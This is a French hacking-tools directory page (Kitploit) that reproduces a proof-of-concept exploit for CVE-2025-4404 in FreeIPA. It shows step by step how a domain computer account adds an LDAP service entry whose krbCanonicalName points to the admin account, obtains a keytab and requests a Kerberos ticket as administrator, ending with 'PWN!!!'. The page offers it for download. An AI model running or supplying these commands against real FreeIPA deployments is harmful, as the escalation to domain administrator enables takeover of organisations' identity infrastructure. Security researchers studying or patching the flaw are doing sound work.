Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-4404-POC — POC pour CVE-2025-4404 | Kitploit
Outils/GitHubGitHub/im10n/cve-2025-4404-poc
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionAuthentification
GitHubim10n/cve-2025-4404-poc

CVE-2025-4404-POC

POC pour CVE-2025-4404

Voir le dépôt
62il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-4404 Preuve de concept

Preuve de concept pour CVE-2025-4404

Si vous possédez un compte d'ordinateur de domaine (host/pc1.[email protected]), vous pouvez alors ajouter le service par défaut. Et vous pouvez définir krbPrincipalName et krbCanonicalName. Par défaut, la valeur de l'attribut krbCanonicalName est manquante pour le compte administrateur FreeIPA 4.12.4. Vous pouvez demander un ticket Kerberos avec la valeur krbPrincipalName, mais le ticket contiendra la valeur krbCanonicalName.

C'est parti

  1. Tout d'abord, nous allons demander un ticket au nom du compte de l'ordinateur : $ kinit host/[email protected] -k -t /etc/krb5.keytab

  2. Ajouter au compte de service LDAP :

root@kitploit:~
$ ldapadd -H ldap://dc1.test.local
dn: krbprincipalname=test/[email protected],cn=services,cn=accounts,dc=test,dc=local
ipaKrbPrincipalAlias: test/[email protected]
krbPrincipalName: test/[email protected]
objectClass: ipaKrbPrincipal
objectClass: ipaObject
objectClass: ipaService
objectClass: krbPrincipal
objectClass: krbPrincipalAux
objectClass: top
krbCanonicalName: [email protected]
managedBy: fqdn=pc1.test.local,cn=computers,cn=accounts,dc=test,dc=local
  1. Demander un keytab
root@kitploit:~
$ ipa-getkeytab -p test/[email protected] -k ./test.keytab --mech=GSSAPI
$ kdestroy -A
  1. Demander un ticket $ kinit --no-request-pac -k -t ./test.keytab test/[email protected]

PWN!!!

Vous pouvez vérifier le ticket avec : ldapwhoami -H ldap://dc1.test.local

Télécharger l’outil